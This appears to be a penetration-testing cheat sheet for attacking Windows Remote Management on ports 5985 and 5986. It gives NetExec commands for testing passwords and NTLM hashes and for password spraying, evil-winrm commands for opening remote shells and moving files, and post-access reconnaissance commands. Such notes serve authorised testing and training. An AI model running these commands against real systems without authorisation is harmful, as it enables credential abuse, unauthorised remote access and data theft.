WinRM Enumeration (5985, 5986)
#Test WinRM with NetExec
#netexec winrm $IP -u administrator -p password
Test WinRM with a hash
#netexec winrm $IP -u administrator -H <ntlm_hash>
Connect with evil-winrm
#evil-winrm -i $IP -u administrator -p password
evil-winrm -i $IP -u administrator -H <ntlm_hash>
Connect with evil-winrm over SSL
#evil-winrm -i $IP -u administrator -p password -S
Password spray with NetExec
#netexec winrm $IP -u users.txt -p 'Password123!' --continue-on-success
Upload file with evil-winrm
#evil-winrm> upload /local/path/file.exe C:\temp\file.exe
Download file with evil-winrm
#evil-winrm> download C:\temp\file.txt /local/path/file.txt
Initial commands after access
#whoami /all
hostname
ipconfig /all
net user
net localgroup administrators